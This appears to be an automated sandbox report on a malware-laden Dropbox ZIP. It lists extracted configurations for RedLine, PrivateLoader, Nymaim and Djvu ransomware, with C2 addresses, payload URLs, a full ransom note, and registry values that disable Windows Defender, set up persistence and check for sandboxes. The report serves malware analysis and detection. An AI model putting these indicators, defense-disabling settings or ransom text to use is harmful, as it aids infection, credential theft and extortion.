Resubmissions
  16-09-2022 06:07  220916-gvaj4saeen  score 10
  16-09-2022 06:06  220916-gtp86segh5  score 1
  16-09-2022 05:24  220916-f36rvaaeal  score 10
  15-09-2022 08:38  220915-kj2e8scdh7  score 10

Analysis
max time kernel: 301s
max time network: 304s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 16-09-2022 05:24
Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
  Sample: https://www.dropbox.com/s/v74d5j0q01fe6uk/File.zip?dl=0
  Resource: win7-20220812-en
Behavioral task: behavioral2
  Sample: https://www.dropbox.com/s/v74d5j0q01fe6uk/File.zip?dl=0
  Resource: win10v2004-20220812-en

General
Target: https://www.dropbox.com/s/v74d5j0q01fe6uk/File.zip?dl=0
Malware Config

Extracted: privateloader
  payload_url: https://vipsofts.xyz/files/mega.bmp

Extracted: redline
  Botnet: nam6.2
  C2: 103.89.90.61:34589
  auth_value: 4040fe7c77de89cf1a6f4cebd515c54c

Extracted: redline
  Botnet: crtest
  C2: denestyenol.xyz:81
  auth_value: ac9c5d38bbc1b733c499deeab5940e0d

Extracted: redline
  Botnet: Lyla3.12.09
  C2: 185.215.113.216:21921
  auth_value: 893298c4bebea403e4a59dd151c4fcc2

Extracted: nymaim
  C2: 208.67.104.97
  C2: 85.31.46.167

Extracted: djvu
  C2: http://acacaca.org/test3/get.php
  extension: .eemv
  offline_id: 5IVlpkccZlJz0AZ5atgGWVKe9CGAnXjohDf40mt1
  payload_url: http://rgyui.top/dl/build2.exe
  payload_url: http://acacaca.org/files/1/build3.exe
  ransomnote: ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-0e5rCKsYCc Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@bestyourmail.ch Reserve e-mail address to contact us: datarestorehelp@airmail.cc Your personal ID: 0560Jhyjd

Extracted: redline
  Botnet: 3108_RUZKI
  C2: 213.219.247.199:9452
  auth_value: f71fed1cd094e4e1eb7ad1c53e542bca
Signatures

DcRat (18 IoCs)
DarkCrystal (DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
Detected Djvu ransomware (5 IoCs)
Processes:
  behavioral2/memory/2140-319-0x0000000000400000-0x0000000000537000-memory.dmp  yara_rule: family_djvu
  behavioral2/memory/5788-321-0x0000000002210000-0x000000000232B000-memory.dmp  yara_rule: family_djvu
  behavioral2/memory/2140-316-0x0000000000400000-0x0000000000537000-memory.dmp  yara_rule: family_djvu
  behavioral2/memory/2140-314-0x0000000000400000-0x0000000000537000-memory.dmp  yara_rule: family_djvu
  behavioral2/memory/2140-335-0x0000000000400000-0x0000000000537000-memory.dmp  yara_rule: family_djvu
Detects Smokeloader packer (1 IoC)
Processes:
  behavioral2/memory/5752-310-0x00000000001C0000-0x00000000001C9000-memory.dmp  yara_rule: family_smokeloader
Djvu Ransomware
Ransomware which is a variant of the STOP family.

Processes:
  ybRTF_ZrBzghRmdqS2tL_QaU.exe: Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection
  ybRTF_ZrBzghRmdqS2tL_QaU.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"
  ybRTF_ZrBzghRmdqS2tL_QaU.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"
  ybRTF_ZrBzghRmdqS2tL_QaU.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"
  ybRTF_ZrBzghRmdqS2tL_QaU.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"
  ybRTF_ZrBzghRmdqS2tL_QaU.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"
  ybRTF_ZrBzghRmdqS2tL_QaU.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
  rundll32.exe (pid 55508, pid_target 3572): Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine payload (8 IoCs)
Processes:
  behavioral2/memory/6036-230-0x0000000000C30000-0x00000000015C6000-memory.dmp  yara_rule: family_redline
  behavioral2/memory/380-225-0x00000000009C0000-0x00000000009E8000-memory.dmp  yara_rule: family_redline
  C:\Users\Admin\Pictures\Minor Policy\n2bxaZuE24qU0suJTAECSlqq.exe  yara_rule: family_redline
  C:\Users\Admin\Pictures\Minor Policy\n2bxaZuE24qU0suJTAECSlqq.exe  yara_rule: family_redline
  behavioral2/memory/5772-247-0x0000000000B30000-0x0000000000B58000-memory.dmp  yara_rule: family_redline
  behavioral2/memory/6044-280-0x00000000007C0000-0x000000000111E000-memory.dmp  yara_rule: family_redline
  behavioral2/memory/6036-281-0x0000000000C30000-0x00000000015C6000-memory.dmp  yara_rule: family_redline
  behavioral2/memory/59796-430-0x0000000000400000-0x0000000000420000-memory.dmp  yara_rule: family_redline
SmokeLoader
Modular backdoor trojan in use since 2014.

Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 3 IoCs)
Processes:
  nnb09fHefcHKAg9TUhBoFZHP.exe: Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__
  gVzdKeepeV1HvUj2IfZ0crmv.exe: Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__
  eHFS6NZuqQ_xO0mJVksaQreP.exe: Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Downloads MZ/PE file

Drops file in Drivers directory (3 IoCs)
Processes:
  DnsService.exe: File opened for modification C:\Windows\System32\drivers\etc\hosts
  DnsService.exe: File opened for modification C:\Windows\System32\drivers\etc\hosts
  DnsService.exe: File opened for modification C:\Windows\System32\drivers\etc\hosts
Executes dropped EXE (64 IoCs)
Modifies Windows Firewall (1 TTP, 1 IoC)

Processes:
  C:\Users\Admin\Pictures\Minor Policy\_TiaXZiUu6XgZbvoAZY2sRH0.exe  yara_rule: vmprotect
  C:\Users\Admin\Pictures\Minor Policy\_TiaXZiUu6XgZbvoAZY2sRH0.exe  yara_rule: vmprotect
  behavioral2/memory/5764-232-0x0000000140000000-0x0000000140608000-memory.dmp  yara_rule: vmprotect
Checks BIOS information in registry (2 TTPs, 8 IoCs)
BIOS information is often read in order to detect sandboxing environments.
Processes:
  eHFS6NZuqQ_xO0mJVksaQreP.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
  eHFS6NZuqQ_xO0mJVksaQreP.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
  nnb09fHefcHKAg9TUhBoFZHP.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
  nnb09fHefcHKAg9TUhBoFZHP.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
  Install.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
  gVzdKeepeV1HvUj2IfZ0crmv.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
  gVzdKeepeV1HvUj2IfZ0crmv.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
  rundll32.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
Checks computer location settings (2 TTPs, 18 IoCs)
Looks up the country code configured in the registry, likely a geofence.
Drops startup file (1 IoC)
Processes:
  Adblock.exe: File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adblock Fast.lnk
Loads dropped DLL (30 IoCs)
Modifies file permissions (1 TTP, 1 IoC)

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Processes:
  C:\Users\Admin\Pictures\Minor Policy\eHFS6NZuqQ_xO0mJVksaQreP.exe  yara_rule: themida
  C:\Users\Admin\Pictures\Minor Policy\nnb09fHefcHKAg9TUhBoFZHP.exe  yara_rule: themida
  C:\Users\Admin\Pictures\Minor Policy\eHFS6NZuqQ_xO0mJVksaQreP.exe  yara_rule: themida
  C:\Users\Admin\Pictures\Minor Policy\gVzdKeepeV1HvUj2IfZ0crmv.exe  yara_rule: themida
  C:\Users\Admin\Pictures\Minor Policy\gVzdKeepeV1HvUj2IfZ0crmv.exe  yara_rule: themida
  C:\Users\Admin\Pictures\Minor Policy\nnb09fHefcHKAg9TUhBoFZHP.exe  yara_rule: themida
  behavioral2/memory/6044-280-0x00000000007C0000-0x000000000111E000-memory.dmp  yara_rule: themida
  behavioral2/memory/6036-281-0x0000000000C30000-0x00000000015C6000-memory.dmp  yara_rule: themida
Unexpected DNS network traffic destination (64 IoCs)
Network traffic to servers other than the configured DNS servers was detected on the DNS port.
Uses the VBS compiler for execution (1 TTP)
Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
Processes:
  explorer.exe: Key opened \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
  explorer.exe: Key opened \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
  explorer.exe: Key opened \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
Adds Run key to start application (2 TTPs, 6 IoCs)
Processes:
  msedge.exe: Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows\CurrentVersion\Run
  VQbpujdSGomqnbS9WjiyreEK.exe: Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\fc9a62cb-7d5f-48e5-9c75-c63867ff4d84\\VQbpujdSGomqnbS9WjiyreEK.exe\" --AutoStart"
  2Se_pjJglnDpbeqjf2ldznTA.exe: Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce
  2Se_pjJglnDpbeqjf2ldznTA.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""
  xsv.exe: Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows\CurrentVersion\Run
  xsv.exe: Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Clipper = "\"C:\\Users\\Admin\\AppData\\Roaming\\Clipper\\Clipper.exe\" "
Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Processes:
  eHFS6NZuqQ_xO0mJVksaQreP.exe: Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
  nnb09fHefcHKAg9TUhBoFZHP.exe: Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
  gVzdKeepeV1HvUj2IfZ0crmv.exe: Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
Drops Chrome extension (1 IoC)
Processes:
  oaLvSCW.exe: File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json
Drops desktop.ini file(s) (1 IoC)
Processes:
  oaLvSCW.exe: File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini
Legitimate hosting services abused for malware hosting/C2 (1 TTP)
Looks up external IP address via web service (12 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Drops file in System32 directory (15 IoCs)
Suspicious use of NtSetInformationThreadHideFromDebugger (3 IoCs)
Processes:
  PID 6044: eHFS6NZuqQ_xO0mJVksaQreP.exe
  PID 6036: nnb09fHefcHKAg9TUhBoFZHP.exe
  PID 6020: gVzdKeepeV1HvUj2IfZ0crmv.exe
Suspicious use of SetThreadContext (19 IoCs)
Drops file in Program Files directory (18 IoCs)
Drops file in Windows directory (4 IoCs)
Processes:
  schtasks.exe: File created C:\Windows\Tasks\hEOVRvlnWpJzMGvLw.job
  schtasks.exe: File created C:\Windows\Tasks\CMIDffFQijmeSZd.job
  schtasks.exe: File created C:\Windows\Tasks\tzhoEZPqxAOMgijXP.job
  schtasks.exe: File created C:\Windows\Tasks\bfPiLOEoMHGtOUUyTU.job
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Program crash (24 IoCs)
Checks SCSI registry key(s) (3 TTPs, 12 IoCs)
SCSI information is often read in order to detect sandboxing environments.
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | Dj7oV6pePcIXJQ2f96mvaT24.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | Dj7oV6pePcIXJQ2f96mvaT24.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | AppLaunch.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | AppLaunch.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | build2.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | build2.exe
Creates scheduled task(s) 1 TTPs 15 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | process
19860 | schtasks.exe
20016 | schtasks.exe
11856 | schtasks.exe
12180 | schtasks.exe
66408 | schtasks.exe
12540 | schtasks.exe
12584 | schtasks.exe
12628 | schtasks.exe
12676 | schtasks.exe
12748 | schtasks.exe
6220 | schtasks.exe
72496 | schtasks.exe
59848 | schtasks.exe
11644 | schtasks.exe
12412 | schtasks.exe
Delays execution with timeout.exe 3 IoCs
Processes:
pid | process
10376 | timeout.exe
17828 | timeout.exe
19132 | timeout.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
pid | process
20204 | tasklist.exe
20252 | tasklist.exe
Enumerates system info in registry 2 TTPs 7 IoCs
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | rundll32.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Kills process with taskkill 6 IoCs
Processes:
pid | process
9456 | taskkill.exe
11368 | taskkill.exe
17512 | taskkill.exe
18992 | taskkill.exe
70776 | taskkill.exe
6548 | taskkill.exe
Processes:
368C0412AGB029I.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" 368C0412AGB029I.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch 368C0412AGB029I.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" 368C0412AGB029I.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Toolbar Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\IESettingSync 368C0412AGB029I.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | oaLvSCW.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | oaLvSCW.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | rundll32.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2fb4ccdc-0000-0000-0000-d01200000000} | oaLvSCW.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | oaLvSCW.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | rundll32.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | oaLvSCW.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | oaLvSCW.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | oaLvSCW.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer | oaLvSCW.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2fb4ccdc-0000-0000-0000-d01200000000}\MaxCapacity = "15140" | oaLvSCW.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket | oaLvSCW.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | rundll32.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | rundll32.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe
Modifies registry class 5 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings | msedge.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | Install.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | KJN4UTMVm4u4hm7saACgHkd5.exe
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings | 0JE7G3LK557H5E8.exe
Modifies registry key 1 TTPs 1 IoCs
-
Runs ping.exe 1 TTPs 2 IoCs
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description | flow | ioc
HTTP User-Agent header | 281 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid | process
4980 | msedge.exe
4980 | msedge.exe
4880 | msedge.exe
4880 | msedge.exe
1072 | identity_helper.exe
1072 | identity_helper.exe
4092 | msedge.exe
4092 | msedge.exe
5276 | Install.exe
5276 | Install.exe
5276 | Install.exe
5276 | Install.exe
5276 | Install.exe
5276 | Install.exe
1576 | msedge.exe
1576 | msedge.exe
1576 | msedge.exe
1576 | msedge.exe
1576 | msedge.exe
6044 | eHFS6NZuqQ_xO0mJVksaQreP.exe
6044 | eHFS6NZuqQ_xO0mJVksaQreP.exe
6044 | eHFS6NZuqQ_xO0mJVksaQreP.exe
6036 | nnb09fHefcHKAg9TUhBoFZHP.exe
6036 | nnb09fHefcHKAg9TUhBoFZHP.exe
5752 | uV50xbiY4LlMWsebJOoi_R_O.exe
5752 | uV50xbiY4LlMWsebJOoi_R_O.exe
380 | n2bxaZuE24qU0suJTAECSlqq.exe
380 | n2bxaZuE24qU0suJTAECSlqq.exe
4272 | 4CBGCHM82DE58EB.exe
4272 | 4CBGCHM82DE58EB.exe
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
